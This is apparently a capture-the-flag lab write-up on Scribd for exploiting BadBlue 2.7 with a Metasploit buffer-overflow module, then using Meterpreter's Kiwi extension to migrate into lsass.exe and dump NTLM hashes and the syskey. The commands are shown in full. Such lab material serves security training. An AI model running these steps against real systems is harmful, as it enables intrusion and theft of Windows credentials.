Scribd
Upload
13 views8 pages

Windows-Meterpreter-Kiwi Extension

This document outlines the steps to exploit a vulnerable application (BadBlue 2.7) using Metasploit and the Kiwi extension for post-exploitation tasks. It includes commands for scanning the target, exploiting the vulnerability, and extracting NTLM hashes and Syskey. The document serves as a reference for various commands necessary for completing the lab exercise.

Uploaded by

Harlian
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
13 views8 pages

Windows-Meterpreter-Kiwi Extension

This document outlines the steps to exploit a vulnerable application (BadBlue 2.7) using Metasploit and the Kiwi extension for post-exploitation tasks. It includes commands for scanning the target, exploiting the vulnerability, and extracting NTLM hashes and Syskey. The document serves as a reference for various commands necessary for completing the lab exercise.

Uploaded by

Harlian
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 8

Name Windows: Meterpreter: Kiwi Extension

URL https://attackdefense.com/challengedetails?cid=2340

Type Post Exploitation: With Metasploit

Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.

Step 1: Checking target IP address.

Note: The target IP address is stored in the “target” file.

Command: cat /root/Desktop/target

Step 2: Run a Nmap scan against the target IP.

Command: nmap 10.0.27.166


Step 3: We have discovered that multiple ports are open. We will run nmap again to determine
version information on port 80.

Command: nmap -sV -p 80 10.0.27.166

Step 4: We will search the exploit module for badblue 2.7 using searchsploit.

Command: searchsploit badblue 2.7


Step 5: There is a metasploit module for badblue server. We will use PassThu remote buffer
overflow metasploit module to exploit the target.

Commands:
msfconsole -q
use exploit/windows/http/badblue_passthru
set RHOSTS 10.0.27.166
exploit

We have successfully exploited the target vulnerable application (badblue) and received a
meterpreter shell.

Step 6: Migrate the current process into lsass.exe

Command: migrate -N lsass.exe


Step 7: Load kiwi extension

Command: load kiwi

Step 8: Dump Administrator NTLM hash using Kiwi extension commands.

Command: creds_all
This revealed the flag to us:

Administrator User NTLM Hash: e3c61a68f1b89ee6c8ba9507378dc88d

Step 9: Extract all the users NTLM hash using Kiwi.

Command: lsa_dump_sam
This revealed another flag to us:

Student User NTLM Hash: bd4ca1fbe028f3c5066467a7f6a73b0b

Step 10: Find the syskey by dumping the LSA secrets.

Command: lsa_dump_secrets
This revealed another flag to us:

Syskey: 377af0de68bdc918d22c57a263d38326

References

1. BadBlue 2.72b - Multiple Vulnerabilities (https://www.exploit-db.com/exploits/4715)


2. Metasploit Module
(https://www.rapid7.com/db/modules/exploit/windows/http/badblue_passthru)

You might also like